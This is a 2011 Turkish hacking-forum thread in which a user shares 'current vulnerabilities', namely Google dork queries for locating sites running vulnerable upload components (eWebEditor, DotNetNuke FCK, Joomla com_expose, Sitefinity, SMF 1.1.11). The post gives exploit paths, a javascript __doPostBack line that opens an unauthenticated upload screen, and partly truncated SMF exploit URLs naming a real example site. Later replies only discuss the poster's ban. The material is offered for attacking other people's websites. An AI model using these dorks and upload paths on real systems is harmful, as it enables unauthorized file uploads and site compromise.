İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Güncel Açıklar //PoisonScorpion

14-11-2011 06:39
#1
PoisonScorpion - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2011
Nereden:
İstanbul
Mesajlar:
1.389
Teşekkür (Etti):
13
Teşekkür (Aldı):
1075
Konular:
431
Ticaret:
(0) %
PoisonScorpion ;

Selamun aleyküm , kardeşlerim.

Bu konuda sizlerle güncel açıkları paylaşıyorum , bu açıkların detaylarını forumda arama yaparak veya googlede arama yaparak detaylı bilgi alabilirsiniz yada bana özelden ulaşarak..

Güncel Açıklar


EN GÜNCEL AÇIKLAR
inurl:”/admin/saveannounce_upload.asp”
inurl:”admin/eWebEditor/Upload.asp”
inurl:”UploadFile/upload.asp”


Dotnuke uplaod açıgı ;
inurl:/tabid/36/language/en-US/Default.aspx
Upload Sayfasi
Için; /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Upload Kod : javascript:__doPostBack(’ctlUR L$cmdUpload’,’’ ) bu kod tarayıcınızın adres bolumune adres cubuguna yanı yazıp enterlayınca upload ekrani gelir.
Mesela
inurl:tabid/1162/Default.aspx degişik şekillerde kod geliştirilebilir.


Editör açıgı
inurl:editor/assetmanager/ (arama kodu geliştirilebilir)
EXPLOİT : /Editor/assetmanager/assetmanager.asp



Joomla upload açıgı
inurl index.php?option=com_expose
Exploit: administrator/components/com_expose/uploadimg.php
Uploadin gittigi yer : /components/com_expose/expose/img/


Sitefinity: Login upload açıgı
inurl:”Sitefinity: Login”
exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx


SMF 1.1.11 açıgı
inurl:SMF 1.1.11
Exploit :
http://siteadi.com/index.php?action=...ode=0eb3d1f811

örnek site :
http://modxcms.com/forums/index.php?...word;u=1;code= 0eb3d1f811


//PoisonScorpion
snowcu76, korkusa Teşekkür etti.

14-11-2011 20:59
#2
PoisonScorpion - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2011
Nereden:
İstanbul
Mesajlar:
1.389
Teşekkür (Etti):
13
Teşekkür (Aldı):
1075
Konular:
431
Ticaret:
(0) %
//Güncel..

//PoisonScorpion
16-11-2011 21:00
#3
Üyelik tarihi:
01/2011
Mesajlar:
139
Teşekkür (Etti):
7
Teşekkür (Aldı):
11
Konular:
28
Ticaret:
(0) %
Niye Uzaklaştırıldı
17-11-2011 00:17
#4
kaoma - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2011
Mesajlar:
110
Teşekkür (Etti):
3
Teşekkür (Aldı):
5
Konular:
15
Ticaret:
(0) %
Alıntı:
ßy[P]robleM´isimli üyeden Alıntı Mesajı göster
Niye Uzaklaştırıldı
Bilinmiyor 1 hafta ban yemiş sebebsiz
Kullanıcı İmzası
Uzmanlık Alanlarım;

TELNET
Sql İnjektion
17-11-2011 00:50
#5
BluehackerTR - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2011
Mesajlar:
207
Teşekkür (Etti):
38
Teşekkür (Aldı):
50
Konular:
38
Ticaret:
(0) %
Ban sebebi " " Yazıyor bos oda uzgun yanlıs ban yemıs sanırım

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı